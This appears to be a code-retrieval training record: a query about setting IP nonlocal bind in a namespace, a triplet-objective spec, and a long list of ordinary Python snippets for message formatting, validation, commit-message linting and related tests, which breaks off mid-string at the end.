        ip_lib.set_ip_nonlocal_bind_for_namespace('foo', value=1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def format(self, message):", "def _formatMessage(self, msg, standardMsg):\r\n if not self.longMessage:\r\n return msg or standardMsg\r\n if msg is None:\r\n return standardMsg\r\n try:\r\n return '%s : %s' % (standardMsg, msg)\r\n except UnicodeDecodeError:\r\n return '%s : %s' % (safe_str(standardMsg), safe_str(msg))", "def check_message(self, msg):\n pass", "def validate_message(self, state_id, msg):\n pass", "def _formatMessage(msg, standardMsg):\n if msg is None:\n return standardMsg\n try:\n # don't switch to '{}' formatting in Python 2.X\n # it changes the way unicode input is handled\n return '%s : %s' % (standardMsg, msg)\n except UnicodeDecodeError:\n return '%s : %s' % (repr(standardMsg), repr(msg))", "def __ensure_error_message_restriction_compliance(full_message):\n message_size_limit = Constants.STATUS_ERROR_MSG_SIZE_LIMIT_IN_CHARACTERS\n formatted_message = re.sub(r\"\\s+\", \" \", str(full_message))\n return formatted_message[:message_size_limit-3] + '...' if len(formatted_message) > message_size_limit else formatted_message", "def test_msg_generation(self):\n try:\n record_str = generate_json_message()\n except (Exception, ValueError) as error:\n print(error)\n assert(False)\n assert(validate_record_format(record_str))", "def horde_message(self, message):", "def __format_message(message, as_json=False):\n formatted_message = None\n if as_json:\n formatted_message = json_format.MessageToJson(message, sort_keys=True)\n else:\n formatted_message = text_format.MessageToString(message)\n return formatted_message", "def message_check(self, message):\n if(message == \"\"):\n return False\n\n if(len(message) > 256):\n return False\n\n return True", "def check_message(self):\n def check(fld_key):\n if not self[fld_key]:\n string = self._fields[fld_key].string\n raise UserError(\n _(\"%s field required to send an email.\") % string)\n if self.email_type == 'general':\n check('subject')\n check('body')\n elif self.email_type == 'scheduled':\n check('date')\n check('duration')\n check('priority')\n check('sub_subject')\n check('mail_template_id')", "def parse_message(self, message):\n pass", "def _validate_input(self):\n\n if is_empty(self.message) == True:\n raise ValidationException(\"Message cannont be empty.\")", "def test_buoy_format1():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_1)\n assert str(err_info.value) == 'Input formatted incorrectly, see instructions'", "def validate_format(self):\n raise NotImplementedError()", "def _test_parts(self):\n\n message = []\n\n if self._year is None:\n message.append(\"No year\")\n else:\n try:\n int(self._year)\n except:\n message.append(\"Bad year {}\".format(self._year))\n\n if not self._release:\n message.append(\"No release\")\n else:\n try:\n assert (int(self._release) in [1, 5])\n except:\n message.append(\"Bad release {}\".format(self._release))\n\n if not self._state:\n message.append(\"No state\")\n elif len(self._state) != 2:\n message.append(\"Bad state {}\".format(self._state))\n\n if not self._record_type:\n message.append(\"No record_type\")\n else:\n try:\n assert(self._record_type.upper()[0] in ['H','P'])\n except:\n message.append(\"Bad record type {}\".format(self._record_type))\n\n return message", "def test_format_log_message(self, log_message):\n token = Token(\"NDY3MjIzMjMwNjUwNzc3NjQx\", \"XsySD_\", \"s45jqDV_Iisn-symw0yDRrk_jf4\")\n log_message.format.return_value = \"Howdy\"\n\n return_value = TokenRemover.format_log_message(self.msg, token)\n\n 
self.assertEqual(return_value, log_message.format.return_value)\n log_message.format.assert_called_once_with(\n author=self.msg.author,\n author_id=self.msg.author.id,\n channel=self.msg.channel.mention,\n user_id=token.user_id,\n timestamp=token.timestamp,\n hmac=\"x\" * len(token.hmac),\n )", "def getMessage() -> str:\n pass", "def handle_message(self, validated_message: dict):\n pass", "def fmt(message):\n return \"---------- \" + message + \" ----------\"", "def _FormatMessage(self, message):\n script_name = os.path.basename(sys.argv[0])\n timestamp = datetime.now().isoformat()\n formatted_message = '[{0:s}] {1:s}: {2:s} - {3:s}\\n'.format(\n timestamp, script_name, self._sender, message)\n return formatted_message", "def test_incorrect_format_1(self):\n changelog = changelog_temp.format(\n before_changelog=\"## [Not yet released]\\n\\n### Added\\n\\n- Added a new feature\\n\"\n )\n with pytest.raises(ValueError):\n parse_changelog(changelog)", "def validate_new_message(payload):\n serialized_message = json.loads(payload)\n message = Message.make(serialized_message)\n print(\"Message ({0}) contents: {1}\".format(message.type, message))\n return message", "def test_message_roundtrip(self):\n with open(MESSAGES_LOG_FILE, \"rb\") as fd:\n for line in fd:\n timestamp, msg_data = line.split(b\",\", 1)\n assert msg_data.endswith(b\"\\r\\n\")\n msg = message.fromString(msg_data)\n recovered_msg_data = message.toString(msg)\n\n # Ideally, I would like to be able to check msg_data agsint\n # the recovered_msg_data but because of string stripping this\n # is not possible.\n # self.assertEqual(recovered_msg_data, msg_data)\n\n # Therefore convert the recovered string back into a message\n # object and compare that.\n recovered_msg = message.fromString(recovered_msg_data)\n self.assertEqual(recovered_msg, msg)", "def _check_whitespace_formatting(self, docstring: PetscDocStringImpl) -> None:\n format_diag = self.diags.formatting\n base_mess = f'{self.transform(self.name)} values must be (1) space away from colon not ({{}})'\n for (line, line_after_colon), sub_items in self.items:\n colon_idx = line.find(':')\n if colon_idx < 0:\n continue\n\n correct_offset = colon_idx + 2\n rest_idx = line.find(line_after_colon)\n if rest_idx == correct_offset:\n continue\n\n nspaces = rest_idx - correct_offset\n if rest_idx > correct_offset:\n sub = ' ' * nspaces\n offset = correct_offset\n fix = ''\n else:\n sub = ':'\n offset = colon_idx\n fix = ': '\n floc = docstring.make_source_range(sub, line, sub_items[0][0].start.line, offset=offset)\n docstring.add_diagnostic_from_source_range(\n Diagnostic.Kind.ERROR, format_diag, base_mess.format(nspaces + 1), floc, patch=Patch(floc, fix)\n )\n return", "def consolidate_messages(self, msg):", "def lint_commit_message(commit):\n success = True\n lines = commit.message.splitlines()\n\n # Check length of summary line.\n summary_line_len = len(lines[0])\n if summary_line_len > COMMIT_MSG_MAX_SUMMARY_LEN:\n error(\n \"The summary line in the commit message is %d characters long; \"\n \"only %d characters are allowed.\" %\n (summary_line_len, COMMIT_MSG_MAX_SUMMARY_LEN), commit)\n success = False\n\n # Check that summary line does not end with a period\n if lines[0].endswith('.'):\n error(\"The summary line must not end with a period.\", commit)\n success = False\n\n # Check that we don't have any fixups.\n if lines[0].startswith('fixup!'):\n error(\"Fixup commits are not allowed. 
Please resolve by rebasing.\",\n commit)\n success = False\n\n # Try to determine whether we got an area prefix in the commit message:\n summary_line_split = lines[0].split(':')\n summary_line_split_len = len(summary_line_split)\n\n # We didn't get an area prefix, so just make sure the message started with a\n # capital letter.\n if summary_line_split_len == 1:\n if not re.match(r'[A-Z]', lines[0]):\n error(\"The summary line must start with a capital letter.\", commit)\n success = False\n # The user specified an area on which she worked.\n elif summary_line_split_len == 2:\n if not re.match(r'[a-z_A-Z\\-]*(/[a-z_A-Z\\-]+)*', summary_line_split[0]):\n error(\n 'The area specifier is mal-formed. Only letters,'\n 'underscores and hyphens are allowed. Different areas must be'\n 'separated by a slash.', commit)\n success = False\n # Check the second part of the commit message.\n if not summary_line_split[1].startswith(' '):\n error(\"The area must be separated by a single space.\", commit)\n success = False\n if not re.match(r'\\s[A-Z]', summary_line_split[1]):\n error(\n \"The summary line after the colon must start with a capital letter.\",\n commit)\n success = False\n # We do not allow more than one area i.e., colon.\n else:\n error(\"Only one colon is allowed to specify the area of changes.\",\n commit)\n success = False\n\n # Check for an empty line separating the summary line from the long\n # description.\n if len(lines) > 1 and lines[1] != \"\":\n error(\n \"The second line of a commit message must be empty, as it \"\n \"separates the summary from the long description.\", commit)\n success = False\n\n return success", "def _format_message_cee(message):\n try:\n meniscus_sd = message['_SDATA']['meniscus']\n tenant_id = meniscus_sd['tenant']\n message_token = meniscus_sd['token']\n\n #if there is a key error then the syslog message did\n #not contain necessary credential information\n except KeyError:\n error_message = 'tenant_id or message token not provided'\n _LOG.debug('Message validation failed: {0}'.format(error_message))\n raise errors.MessageValidationError(error_message)\n\n # format to CEE\n cee_message = dict()\n\n cee_message['time'] = message.get('ISODATE', '-')\n cee_message['host'] = message.get('HOST', '-')\n cee_message['pname'] = message.get('PROGRAM', '-')\n cee_message['pri'] = message.get('PRIORITY', '-')\n cee_message['ver'] = message.get('VERSION', \"1\")\n cee_message['pid'] = message.get('PID', '-')\n cee_message['msgid'] = message.get('MSGID', '-')\n cee_message['msg'] = message.get('MESSAGE', '-')\n cee_message['native'] = message.get('_SDATA', {})\n\n #send the new cee_message to be validated\n _validate_token_from_cache(tenant_id, message_token, cee_message)", "def can_message_formatter(msg, include_hashtag=False, include_spaces=False):\n\n # This is how obd_conn would handle the formatting. 
Remove the following 2 lines to allow both spaces and hashtags\n if include_hashtag:\n include_spaces=False\n\n # Data\n data_hex = binascii.hexlify(msg.data)\n if include_spaces:\n data_string = \" \".join(data_hex[i:i+2] for i in range(0, len(data_hex), 2))\n else:\n data_string = data_hex\n\n # Seperator\n seperator_string = \"#\" if include_hashtag else \"\"\n if include_spaces:\n seperator_string = \" \" + seperator_string + (\" \" if include_hashtag else \"\")\n\n # Header\n header_string = (\"{:08x}\" if msg.is_extended_id else \"{:02x}\").format(msg.arbitration_id)\n\n # Return value\n return header_string + seperator_string + data_string", "def test_sendMessageInvalidCommand(self):\n error = self.assertRaises(\n ValueError, self.p.sendMessage, \" \", \"param1\", \"param2\"\n )\n self.assertEqual(\n str(error),\n \"Somebody screwed up, 'cuz this doesn't look like a command to \" \"me: \",\n )", "def _check_message(self, _message_contents):\r\n if not type(_message_contents) is dict:\r\n self.logger.error(\"Message should be a dict.\")\r\n return False\r\n if not \"event\" in _message_contents:\r\n self.logger.error(\"Message dict has no event key.\")\r\n return False\r\n if not \"data\" in _message_contents:\r\n self.logger.error(\"Message dict has no data key.\")\r\n return False\r\n if not type(_message_contents[\"event\"]) == str:\r\n self.logger.error(\"Message event is not a string.\")\r\n return False\r\n if len(_message_contents[\"event\"]) == 0:\r\n self.logger.error(\"Message event cannot be empty.\")\r\n return False\r\n if not type(_message_contents[\"data\"]) == list:\r\n self.logger.error(\"Message data is not a list.\")\r\n return False\r\n if len(_message_contents[\"data\"]) == 0:\r\n self.logger.error(\"Message data cannot be empty list.\")\r\n return False\r\n return True", "def test_buoy_format2():\n with pytest.raises(AssertionError) as err_info:\n Check_BuoyDC.check_buoy_format(buoy_format_fail_2)\n assert str(err_info.value) == 'Input length incorrect, see instructions'", "def format_msg(msg):\n if type(msg) == str:\n msg = msg.encode()\n header = str(len(msg))\n header = header.zfill(HEADER_SIZE)\n return header.encode(), msg", "def email_rfc2822_compliance(message, max_line_length=900):\n returnmsg = \"\"\n while len(message) > 0:\n returnmsg = returnmsg + message[:max_line_length] + \"\\r\\n\"\n message = message[max_line_length:]\n\n return returnmsg", "def format(self, message):\n\t\tif type(self.protocol[0]).__name__ == \"Raw\":\n\t\t\treturn self.name + \":\" + message\n\t\treturn message", "def verify_raw_message(self, msg: bytes):\n if not (MIN_MESSAGE_SIZE < len(msg) < MAX_MESSAGE_SIZE):\n raise ValueError(\"Invalid message size!\")\n\n msg_type = get_message_type(msg) # yields a ValueError on invalid type\n msg_sender = get_message_sender(msg) # yields a ValueError if sender is invalid\n msg_round = get_message_round(msg)\n\n if msg_round < self.round:\n raise ValueError(f\"Message to late\")\n\n if msg_round == self.round:\n if msg_type == MessageType.Propose and self.phase > Phase.Propose:\n raise ValueError(f\"Message to late!\")\n if msg_type == MessageType.Acknowledge and self.phase > Phase.Acknowledge:\n if not self.is_leader:\n raise ValueError(f\"Message to late!\")\n elif self.is_leader and msg_type != MessageType.Confirm:\n raise ValueError(\"Leaders only process Confirm messages for current round!\")\n\n if self.node_status[msg_sender] == NodeStatus.ADVERSARIAL:\n return ValueError(\"Message sender is an adversary!\")\n\n # TODO: Drop 
message if some message of the same (type, round, sender)-combination\n # was previously added to the queue.\n\n # Drop messages with invalid signatures\n if not ed25519.verify_attached(msg, NODE_INFOS[msg_sender].public_key):\n return ValueError(\"Signature check failed!\")\n\n return True", "def getMessage():\n return message", "def test_parse_score_msg(self):\r\n\r\n assessment = self.openendedmodule._parse_score_msg(\"{}\", self.test_system)\r\n self.assertEqual(assessment.get(\"valid\"), False)", "def _parse_message(self, exc):\n return '%s: %s' % (exc.__class__.__name__, str(exc))", "def assertAssemblesTo(self, formatted, expectedFormatted):\n text = irc.assembleFormattedText(formatted)\n expectedText = irc.assembleFormattedText(expectedFormatted)\n self.assertEqual(\n irc.assembleFormattedText(formatted),\n expectedText,\n \"%r (%r) is not equivalent to %r (%r)\"\n % (text, formatted, expectedText, expectedFormatted),\n )", "def format(self, kwmsg):\n return kwmsg[\"msg\"]", "def test_compose_email2_good(self):\n pass", "def clean_message_md(self):\n message_md = self.cleaned_data[\"message_md\"]\n lines = filter(None, message_md.splitlines())\n message_md = \" \".join(lines)\n return message_md", "def setUp(self):\n self.single_rfh2_message = open(\n os.path.join(self.messages_dir, \"single_rfh2.dat\"), \"rb\").read()\n self.single_rfh2_message_not_well_formed = \\\n self.single_rfh2_message[0:117] + self.single_rfh2_message[121:]", "def check_commit_msg(commitish):\n\n hdr = CommitSubHeader()\n line_list = dump_raw_body(commitish)\n\n if COMMIT_MESSAGE_CHECK and line_list[1] != \"\":\n if line_list[1].find('REF: ') == -1:\n add_error(\"Summary field must have just one line in %s\" % commitish)\n else:\n add_error(\"No empty line after Summary field in %s\" % commitish)\n\n if COMMIT_MESSAGE_CHECK and len(line_list[0]) < 5 or len(line_list[0]) > 78:\n add_error(\"Wrong size (%d) of Summary field in %s\" % (len(line_list[0]), commitish))\n\n while len(line_list) != 0:\n line = line_list.pop(0)\n\n if line.find('REF: ') == 0:\n if hdr.ref == None:\n hdr.ref = 1 # Not None\n elif COMMIT_MESSAGE_CHECK:\n add_error(\"Field 'REF:' must be once in %s\" % commitish)\n continue\n\n if COMMIT_MESSAGE_CHECK and not Commit.rt_header_fields['REF: '].match(line[len('REF: '):]):\n add_error(\"Wrong field 'REF:' in %s\" % commitish)\n else:\n hdr.ref = line[len('REF: '):]\n\n elif line.find('Signed-off-by: ') == 0:\n if hdr.signed == None:\n hdr.signed = 1 # Not None\n elif COMMIT_MESSAGE_CHECK:\n add_error(\"Field 'Signed-off-by:' must be once in %s\" % commitish)\n continue\n\n if COMMIT_MESSAGE_CHECK and not Commit.rt_header_fields['Signed-off-by: '].match(line[len('Signed-off-by: '):]):\n add_error(\"Wrong field 'Signed-off-by:' in %s\" % commitish)\n else:\n hdr.signed = line[len('Signed-off-by: '):]\n\n elif len(line) != 0:\n hdr.desc = 1\n if COMMIT_MESSAGE_CHECK and len(line) > 78:\n add_error(\"Wrong size (%d) of field 'Description' in %s\" % (len(line), commitish))\n\n if COMMIT_MESSAGE_CHECK and hdr.ref == None:\n add_error(\"No field 'REF:' in %s\" % commitish)\n if COMMIT_MESSAGE_CHECK and hdr.desc == None:\n add_error(\"No field 'Description' in %s\" % commitish)\n if COMMIT_MESSAGE_CHECK and hdr.signed == None:\n add_error(\"No field 'Signed-off-by:' in %s\" % commitish)\n\n return hdr", "def format_message(self, message):\n return \"%s at %s\" % (\n message[0], time.asctime(time.localtime(message[1])))", "def test_no_errors(self):\n test_error = 
\"\\r\\n--------------------------------------------------------------------\\r\\n\"\\\n \"Your code has been rated at 10.00/10 (previous run: 9.33/10, +0.67)\"\n\n self.assertEqual(\n format_errors(test_error),\n None\n )", "def _is_consistent(self) -> bool:\n try:\n enforce(\n isinstance(self.dialogue_reference, tuple),\n \"Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.\".format(\n type(self.dialogue_reference)\n ),\n )\n enforce(\n isinstance(self.dialogue_reference[0], str),\n \"Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.\".format(\n type(self.dialogue_reference[0])\n ),\n )\n enforce(\n isinstance(self.dialogue_reference[1], str),\n \"Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.\".format(\n type(self.dialogue_reference[1])\n ),\n )\n enforce(\n type(self.message_id) is int,\n \"Invalid type for 'message_id'. Expected 'int'. Found '{}'.\".format(\n type(self.message_id)\n ),\n )\n enforce(\n type(self.target) is int,\n \"Invalid type for 'target'. Expected 'int'. Found '{}'.\".format(\n type(self.target)\n ),\n )\n\n # Light Protocol Rule 2\n # Check correct performative\n enforce(\n isinstance(self.performative, SigningMessage.Performative),\n \"Invalid 'performative'. Expected either of '{}'. Found '{}'.\".format(\n self.valid_performatives, self.performative\n ),\n )\n\n # Check correct contents\n actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE\n expected_nb_of_contents = 0\n if self.performative == SigningMessage.Performative.SIGN_TRANSACTION:\n expected_nb_of_contents = 2\n enforce(\n isinstance(self.terms, CustomTerms),\n \"Invalid type for content 'terms'. Expected 'Terms'. Found '{}'.\".format(\n type(self.terms)\n ),\n )\n enforce(\n isinstance(self.raw_transaction, CustomRawTransaction),\n \"Invalid type for content 'raw_transaction'. Expected 'RawTransaction'. Found '{}'.\".format(\n type(self.raw_transaction)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGN_MESSAGE:\n expected_nb_of_contents = 2\n enforce(\n isinstance(self.terms, CustomTerms),\n \"Invalid type for content 'terms'. Expected 'Terms'. Found '{}'.\".format(\n type(self.terms)\n ),\n )\n enforce(\n isinstance(self.raw_message, CustomRawMessage),\n \"Invalid type for content 'raw_message'. Expected 'RawMessage'. Found '{}'.\".format(\n type(self.raw_message)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGNED_TRANSACTION:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.signed_transaction, CustomSignedTransaction),\n \"Invalid type for content 'signed_transaction'. Expected 'SignedTransaction'. Found '{}'.\".format(\n type(self.signed_transaction)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGNED_MESSAGE:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.signed_message, CustomSignedMessage),\n \"Invalid type for content 'signed_message'. Expected 'SignedMessage'. Found '{}'.\".format(\n type(self.signed_message)\n ),\n )\n elif self.performative == SigningMessage.Performative.ERROR:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.error_code, CustomErrorCode),\n \"Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.\".format(\n type(self.error_code)\n ),\n )\n\n # Check correct content count\n enforce(\n expected_nb_of_contents == actual_nb_of_contents,\n \"Incorrect number of contents. Expected {}. 
Found {}\".format(\n expected_nb_of_contents, actual_nb_of_contents\n ),\n )\n\n # Light Protocol Rule 3\n if self.message_id == 1:\n enforce(\n self.target == 0,\n \"Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.\".format(\n self.target\n ),\n )\n except (AEAEnforceError, ValueError, KeyError) as e:\n _default_logger.error(str(e))\n return False\n\n return True", "def validate_message(self, message):\n\n for char in message:\n if ord(char) < 65 or ord(char) > 90:\n raise ValueError('Invalid message. Enigma Machine only supports messages composed of uppercase letters')", "def format(self, command, *params):\n\n\t\tif command.upper() not in self.commands:\n\t\t\traise InvalidCommandError(\"Unknown command\")\n\n\t\t# See RFC 2812 2.3 Messages (2nd paragraph)\n\t\tif len(params) > 15:\n\t\t\traise InvalidParameterCountError(\n\t\t\t\t\"Too much parameters (only 15 allowed)\"\n\t\t\t)\n\n\t\tm = \"{} {}\\r\\n\".format(command, \" \".join(str(x) for x in params))\n\n\t\tif len(m) > 512:\n\t\t\traise MessageTooLongError(\"Message exceeds 512 characters\")\n\n\t\treturn m", "def test_compose_email_somebad(self):\n pass", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def _check_consistency(message: Message, to: str, sender: str) -> Message:\n if message.has_to:\n enforce(\n message.to == to, \"To specified on message does not match envelope.\"\n )\n else:\n message.to = to\n if message.has_sender:\n enforce(\n message.sender == sender,\n \"Sender specified on message does not match envelope.\",\n )\n else:\n message.sender = sender\n return message", "def assert_message_valid(\n protocol: ProtocolMetaData,\n buf: bytes,\n encoded_message: List[Tuple[bytes, bytes]],\n decoded_message: Mapping[str, Any],\n sep: bytes,\n convert_sep_to_soh_for_checksum: bool\n) -> None:\n # Check the begin string.\n begin_string_field = protocol.fields_by_name['BeginString']\n begin_string_value = encode_value(\n protocol,\n begin_string_field,\n decoded_message[begin_string_field.name]\n )\n _assert_field_value_matches(\n begin_string_field,\n protocol.begin_string,\n begin_string_value\n )\n\n # Check the body length.\n body_length_field = protocol.fields_by_name['BodyLength']\n body_length_value = encode_value(\n protocol,\n body_length_field,\n decoded_message[body_length_field.name]\n )\n body_length = calc_body_length(buf, encoded_message, sep)\n _assert_field_value_matches(\n body_length_field,\n body_length_value,\n encode_value(protocol, body_length_field, body_length)\n )\n\n # Check the checksum.\n check_sum_field = protocol.fields_by_name['CheckSum']\n check_sum_value = encode_value(\n protocol,\n check_sum_field,\n decoded_message[check_sum_field.name]\n )\n check_sum = calc_checksum(buf, sep, convert_sep_to_soh_for_checksum)\n _assert_field_value_matches(\n check_sum_field,\n check_sum,\n check_sum_value\n )", "def test_messages(self):\n pass", "def _validate_format(self, full_encrypted_value, **options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def __check(self, msg):\n msg = bytearray(msg)\n # Check that header is correct\n if msg[:2] != b'\\xFB\\xBF':\n return 
False\n # Check that ending is correct\n elif msg[-1:] != b'\\xED':\n return False\n # Check that check byte is correct\n elif msg[-2:-1] != bytes([sum(msg[2:-2]) % 256]):\n return False\n else:\n return True", "def parsed_error_msg(self):\r\n return self.error_msg", "def test_small_message(self):\n message = \"few characters\"\n message_displayed = truncate_message(message, limit=50)\n\n self.assertLessEqual(len(message_displayed), 50)\n self.assertEqual(message_displayed, \"few characters\")", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def test_cli_format_error_handler_messages_broken():\n resp_val = \"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Unauthenticated\",\n \"code\": \"401 Unauthorized\",\n \"details\": {\n \"messageList\": [\n { \"message\":\"Hello1\", \"error\": false },\n { \"error\": true },\n { \"message\":\"Hello3\" }\n ]\n },\n \"kind\": \"status\",\n \"reason\": \"Credentials are not established\"\n}\n\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_error_handler(resp)\n assert \"Error: Unauthenticated\" in output\n assert \"Reason: Credentials are not established\" in output\n assert \"- Error: None\" in output\n assert \"- Info: Hello3\" in output", "def format(self, record):\n record.message = indent_string(record.getMessage())\n if \"%(asctime)\" in self._fmt:\n record.asctime = self.formatTime(record, self.datefmt)\n s = self._fmt % record.__dict__\n if record.exc_info:\n # Cache the traceback text to avoid converting it multiple times\n # (it's constant anyway)\n if not record.exc_text:\n record.exc_text = self.formatException(record.exc_info)\n if record.exc_text:\n if s[-1:] != \"\\n\":\n s = s + \"\\n\"\n s = \"{0} Exception:\\n {1}\".format(s, indent_string(record.exc_text))\n return s", "def testStr_NoFieldName(self):\n self.assertEquals('Validation error',\n str(messages.ValidationError('Validation error')))", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def test_sufficientWidth(self):\n msg = \"barbazbo\"\n maxLen = len(\"PRIVMSG foo :{}\".format(msg)) + 2\n self.client.msg(\"foo\", msg, maxLen)\n self.assertEqual(self.client.lines, [\"PRIVMSG foo :{}\".format(msg)])\n self.client.lines = []\n self.client.msg(\"foo\", msg, maxLen - 1)\n self.assertEqual(2, len(self.client.lines))\n self.client.lines = []\n self.client.msg(\"foo\", msg, maxLen + 1)\n self.assertEqual(1, len(self.client.lines))", "def send(self):\n if self._valid:\n try:\n self.connection.sendmail(self.sender, self.receiver, self.formatted_message)\n return 0, f'Successfully sent email {self.sender} -> {self.receiver}'\n except Exception as e:\n return 2, str(e)\n else:\n return 1, 'Invalid email formatting, message not sent'", "def determineMessageValidity(message):\n return 
Sentience._determineMessagePositivityWrapper(message, overall=False)", "def handle_message(self, message):", "def format(self, record, *args, **kwargs):\n if (\n (\n hasattr(record, 'line_number') or\n hasattr(record, 'line_number_list') or\n hasattr(record, 'column_number') or\n hasattr(record, 'column_number_list'))\n and not hasattr(record, 'filename_')):\n raise ValueError(\n 'Tried to log about a line/column with no filename')\n return super(ValidationMessageFormatter, self).format(record,\n *args,\n **kwargs)", "def test_incorrect_formats(self, text):\n with pytest.raises(ValueError):\n parse_changelog(text)", "def validate(self):\n\n if not (self.from_currency and self.to_currency):\n return \"Please you should provide two currencies\"\n if not self.date:\n self.date = \"latest\"\n else:\n try:\n datetime.strptime(self.date, \"%Y-%m-%d\")\n except ValueError as err:\n return str(err)", "async def goodbye_message(self, ctx, *, message):\n if message.lower() == \"default\":\n message = None\n\n await queries.update_setting(ctx, \"goodbye_settings\", \"message_format\", message)\n\n preview = util.create_goodbye_message(ctx.author, ctx.guild, message)\n await ctx.send(\n f\":white_check_mark: New goodbye message format set:\\n```{message}```Preview:\\n\\n{preview}\"\n )", "def test_long_message(self):\n message = \"few characters\"\n message_displayed = truncate_message(message, limit=5)\n\n self.assertLessEqual(len(message_displayed), 5)\n self.assertEqual(message_displayed, \"fe...\")", "def handle_message(self, msg):\n pass", "def formatEventMessage(self, message):\r\n\t\treturn format.formatEventMessage(message)", "def test_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.info(\"Hello {}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def test_phone_too_short(self):\n phone = Report(\n contact_phone='202',\n )\n\n try:\n phone.full_clean()\n except ValidationError as err:\n phone_error_message = err.message_dict['contact_phone']\n self.assertTrue(phone_error_message == ['Enter a valid value.'])", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def error(message):\n print str(message)", "def test_init_with_valid_body(self):\n body = {'event_name': 'job.created'}\n message = SQSMessage(self.schema, body=body)\n\n assert isinstance(message, SQSMessage)\n assert message.body == body", "def _check_line_is_good(self, string):\r\n # The standard requires we only accept strings ending in \\r\\n or \\n\r\n if (string[-1] != \"\\n\"):\r\n raise ParseError('Line endings were not as expected', string)\r\n \r\n # The standard places a limit on line lengths\r\n if (len(string)) > 512:\r\n raise ProtocolError('Line too long to be valid', string)\r\n \r\n # Trim our trailing whitespace/line endings\r\n return string.rstrip()", "def __validate_raw_message(raw_message: RawMessage) -> None:\n if not isinstance(raw_message, (tuple, list)):\n raise TypeError(\"'raw_message' is not list or tuple type\")\n if not all([isinstance(raw_byte, int) and 0x00 <= raw_byte <= 0xFF for raw_byte in raw_message]):\n raise ValueError(\"'raw_message' does not contain raw bytes (int value between 0 and 255) values only\")", "def test_parseUnformattedText(self):\n self.assertEqual(irc.parseFormattedText(\"hello\"), A.normal[\"hello\"])", "def test_cli_format_status_handler_messages():\n resp_val = 
\"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Component Validation Failed\",\n \"code\": 400,\n \"details\": {\n \"errorCount\": 4,\n \"messageList\": [\n { \"message\":\"Info something you might want to know\",\n \"error\": false,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val0\",\n \"documents\": [\n { \"schema\": \"schema/schema/v1\",\n \"name\": \"someyaml\"\n }\n ],\n \"level\": \"Info\",\n \"source\": \"format-o-matic\"\n },\n { \"message\":\"Conflicting something\",\n \"error\": true,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val1\",\n \"documents\": [\n { \"schema\": \"schema/schema/v1\",\n \"name\": \"someyaml\"\n }\n ],\n \"level\": \"Error\",\n \"diagnostic\": \"Make a doc change\"\n },\n { \"message\": \"Basic info\",\n \"error\": false,\n \"source\": \"Armadadock\"\n },\n { \"message\":\"Backwards something\",\n \"error\": true,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val2\",\n \"documents\": [],\n \"level\": \"Error\"\n },\n { \"message\": \"Missing stuff\",\n \"error\": true\n },\n { \"message\":\"Broken syntax\",\n \"kind\": \"SimpleMessage\",\n \"error\": true,\n \"name\": null,\n \"diagnostic\": null\n }\n ]\n },\n \"kind\": \"Status\",\n \"reason\": \"Validation\"\n}\n\"\"\"\n expected = \"\"\"Error: Component Validation Failed\nReason: Validation\n- Error: val1\n Message: Conflicting something\n Diagnostic: Make a doc change\n Document: schema/schema/v1 - someyaml\n- Error: val2\n Message: Backwards something\n- Error: Missing stuff\n- Error: Broken syntax\n- Info: val0\n Message: Info something you might want to know\n Document: schema/schema/v1 - someyaml\n Source: format-o-matic\n- Info: Basic info\n Source: Armadadock\n\n#### Errors: 4, Warnings: 0, Infos: 2, Other: 0 ####\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_status_handler(resp, is_error=True)\n assert output == expected", "def handle_message(self, message):\n print \"[WARNING] No message handling implemented!\"", "def validation_event(self, message):", "def __str__(self):\n return \"Improperly formatted request: \" + self.source + \", resulting in exception: \" + 